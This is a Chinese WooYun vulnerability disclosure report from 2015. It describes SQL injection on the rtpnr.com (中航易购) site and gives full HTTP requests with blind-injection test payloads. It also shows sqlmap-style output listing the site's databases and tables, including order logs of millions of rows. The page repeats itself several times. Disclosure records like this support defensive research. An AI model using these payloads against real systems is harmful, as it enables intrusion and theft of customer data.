中航易购主站多处SQL注射数百万订单泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113316

漏洞标题：中航易购主站多处SQL注射数百万订单泄露

漏洞作者：路人甲

提交时间：2015-05-11 11:30

修复时间：2015-06-25 14:12

公开时间：2015-06-25 14:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-11：细节已通知厂商并且等待厂商处理中
2015-05-11：厂商已经确认，细节仅向厂商公开
2015-05-21：细节向核心白帽子及相关领域专家公开
2015-05-31：细节向普通白帽子公开
2015-06-10：细节向实习白帽子公开
2015-06-25：细节向公众公开

简要描述：

233

详细说明：

POST /NewEdition/ServeWall/PlateServeWallNew.aspx?0.7027233010157943&platformname=e HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.rtpnr.com
Cookie: ASP.NET_SessionId=1vofiirwz12vru45ppck0kbx; CheckCode=7036
Host: www.rtpnr.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Type=LoadData
测试payload :
e%' AND 3*2=5 AND '000nKtz'!='000nKtz%
e%' AND 3*2=6 AND '000nKtz'!='000nKtz% 
2.
POST /NewEdition/ServeWall/PlateServeWallNew.aspx?0.987686010543257 HTTP/1.1
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.rtpnr.com
Cookie: ASP.NET_SessionId=1vofiirwz12vru45ppck0kbx; CheckCode=7036
Host: www.rtpnr.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
PlatformCode=HB'%20AND%203*2*1%3d6%20AND%20'000Jc9s'%3d'000Jc9s&Type=LoadPlatformStar

漏洞证明：

---
Parameter: platformname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: 0.7027233010157943&platformname=e%' AND 1645=1645 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] AutoTicket
[*] BACKUP
[*] distribution
[*] master
[*] model
[*] MonitorBlocking
[*] msdb
[*] Temp2015
[*] tempdb
[*] tslwp
[*] YeeGo_BackUp
[*] YeeGo_History
[*] YeeGo_Order
[*] YeeGoCopy
[*] YeeGoLog
[*] YeeGoTemp
[*] YeeGoUser
[*] YeeSkyBillings
[*] YeeSkyGo_TEST
[*] YeeSkyGoLog_History
[*] Yeesoho_test
[*] YSK_SAAS_History
[*] YSK_SAAS_TEST
Database: AutoTicket
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| dbo.T_ReceivingOrder_Log_20150509 | 4828407 |
| dbo.T_ReceivingOrder_Log_20150505 | 4761384 |
| dbo.T_ReceivingOrder_Log_20150506 | 4725686 |
| dbo.T_ReceivingOrder_Log_20150427 | 4679033 |
| dbo.T_ReceivingOrder_Log_20150503 | 4663783 |
| dbo.T_ReceivingOrder_Log_20150501 | 4661247 |
| dbo.T_ReceivingOrder_Log_20150417 | 4615511 |
| dbo.T_ReceivingOrder_Log_20150416 | 4578616 |
| dbo.T_ReceivingOrder_Log_20150423 | 4555551 |
| dbo.T_ReceivingOrder_Log_20150508 | 4537936 |
| dbo.T_ReceivingOrder_Log_20150504 | 4529144 |
| dbo.T_ReceivingOrder_Log_20150502 | 4513908 |
| dbo.T_ReceivingOrder_Log_20150428 | 4458769 |
| dbo.T_ReceivingOrder_Log_20150424 | 4426906 |
| dbo.T_ReceivingOrder_Log_20150430 | 4404906 |
| dbo.T_ReceivingOrder_Log_20150325 | 4386799 |
| dbo.T_ReceivingOrder_Log_20150429 | 4357274 |
| dbo.T_ReceivingOrder_Log_20150421 | 4356534 |
| dbo.T_ReceivingOrder_Log_20150418 | 4344581 |
| dbo.T_ReceivingOrder_Log_20150425 | 4338758 |
| dbo.T_ReceivingOrder_Log_20150419 | 4330283 |
| dbo.T_ReceivingOrder_Log_20150420 | 4322006 |
| dbo.T_ReceivingOrder_Log_20150320 | 4313560 |
| dbo.T_ReceivingOrder_Log_20150319 | 4276456 |
| dbo.T_ReceivingOrder_Log_20150311 | 4275833 |
| dbo.T_ReceivingOrder_Log_20150422 | 4270772 |
| dbo.T_ReceivingOrder_Log_20150426 | 4245304 |
| dbo.T_ReceivingOrder_Log_20141230 | 4209479 |
| dbo.T_ReceivingOrder_Log_20150321 | 4192467 |
| dbo.T_ReceivingOrder_Log_20150415 | 4150012 |
| dbo.T_ReceivingOrder_Log_20150507 | 4137469 |
| dbo.T_ReceivingOrder_Log_20150326 | 4117875 |
| dbo.T_ReceivingOrder_Log_20150324 | 4104741 |
| dbo.T_ReceivingOrder_Log_20150403 | 4084876 |
| dbo.T_ReceivingOrder_Log_20150318 | 4070910 |
| dbo.T_ReceivingOrder_Log_20150414 | 4046374 |
| dbo.T_ReceivingOrder_Log_20141231 | 4036910 |
| dbo.T_ReceivingOrder_Log_20150312 | 4000171 |
| dbo.T_ReceivingOrder_Log_20150402 | 3998813 |
| dbo.T_ReceivingOrder_Log_20150322 | 3946956 |
| dbo.T_ReceivingOrder_Log_20150323 | 3929905 |
| dbo.T_ReceivingOrder_Log_20150327 | 3913425 |
| dbo.T_ReceivingOrder_Log_20150331 | 3906339 |
| dbo.T_ReceivingOrder_Log_20150317 | 3898811 |
| dbo.T_ReceivingOrder_Log_20150409 | 3897456 |
| dbo.T_ReceivingOrder_Log_20150413 | 3888902 |
| dbo.T_ReceivingOrder_Log_20150328 | 3885350 |
| dbo.T_ReceivingOrder_Log_20150408 | 3877437 |
| dbo.T_ReceivingOrder_Log_20150411 | 3821738 |
| dbo.T_ReceivingOrder_Log_20150330 | 3817518 |
| dbo.T_ReceivingOrder_Log_20150313 | 3813373 |
| dbo.T_ReceivingOrder_Log_20150407 | 3801984 |
| dbo.T_ReceivingOrder_Log_20150412 | 3798156 |
| dbo.T_ReceivingOrder_Log_20150401 | 3784647 |
| dbo.T_ReceivingOrder_Log_20141229 | 3770215 |
| dbo.T_ReceivingOrder_Log_20150329 | 3758350 |
| dbo.T_ReceivingOrder_Log_20150314 | 3715299 |
| dbo.T_ReceivingOrder_Log_20150316 | 3709434 |
| dbo.T_ReceivingOrder_Log_20150406 | 3699308 |
| dbo.T_ReceivingOrder_Log_20150404 | 3670486 |
| dbo.T_ReceivingOrder_Log_20150315 | 3621205 |
| dbo.T_ReceivingOrder_Log_20150405 | 3573067 |
| dbo.T_ReceivingOrder_Log_20150410 | 3545505 |
| dbo.T_ReceivingOrder_Log_20150510 | 3265968 |
+-----------------------------------+---------+
Database: YeeGoUser
+-------------------------------------+---------+
| Table                               | Entries |
+-------------------------------------+---------+
| dbo.V_Customer_PlatformInfo         | 89126   |
| dbo.T_Application_Platform          | 20165   |
| dbo.T_WorkOrder_PlatformApplication | 13600   |
| dbo.VW_CW_CusWorkOrder_YeeGo        | 11295   |
| dbo.V_CustomerUserInfo              | 8399    |
| dbo.S_CusInfo_SalesManager          | 7011    |
| dbo.V_User_Permission               | 5584    |
| dbo.VW_YeeGo_UserLogin              | 5361    |
| dbo.T_Customer_Application_Account  | 4364    |
| dbo.T_Customer_Application_Account  | 4364    |
| dbo.V_CusApplyInfo                  | 4345    |
| dbo.S_CusInfo_ContactPerson         | 4292    |
| dbo.S_CusInfo_ContactPerson         | 4292    |
| dbo.V_CustomerInfo_ExportUser       | 3959    |
| dbo.SC_UserLogin                    | 3883    |
| dbo.SC_UserBasicData                | 3729    |
| dbo.SC_UserBasicData                | 3729    |
| dbo.VW_PDAction                     | 3641    |
| dbo.VW_SC_UserLogin_YeeGo           | 3641    |
| dbo.T_CustomerID                    | 2503    |
| dbo.SC_UserPermission               | 2312    |
| dbo.T_PDActiveBak                   | 1990    |
| dbo.T_PDActiveBak                   | 1990    |
| dbo.V_CustomerAccount               | 1897    |
| dbo.T_WorkOrderRemark               | 1573    |
| dbo.T_CustomerFlag_logs             | 836     |
| dbo.SC_Role_Permission              | 794     |
| dbo.SC_Role_Permission              | 794     |
| dbo.SC_Permission                   | 160     |
| dbo.T_WorkOrder_QuestionType        | 12      |
| dbo.T_WorkOrder_ContactType         | 10      |
| dbo.V_WorkOrder_ContactType         | 10      |
| dbo.V_WorkOrder_ContactType         | 10      |
| dbo.T_WorkOrder_ContactPurpose      | 9       |
| dbo.T_WorkOrder_ContactPurpose      | 9       |
+-------------------------------------+---------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-05-11 14:10

厂商回复：

感谢反馈！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113316

漏洞标题：中航易购主站多处SQL注射数百万订单泄露

相关厂商：rtpnr.com

漏洞作者：路人甲

提交时间：2015-05-11 11:30

修复时间：2015-06-25 14:12

公开时间：2015-06-25 14:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113316

漏洞标题：中航易购主站多处SQL注射数百万订单泄露

相关厂商：rtpnr.com

漏洞作者： 路人甲

提交时间：2015-05-11 11:30

修复时间：2015-06-25 14:12

公开时间：2015-06-25 14:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113316"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云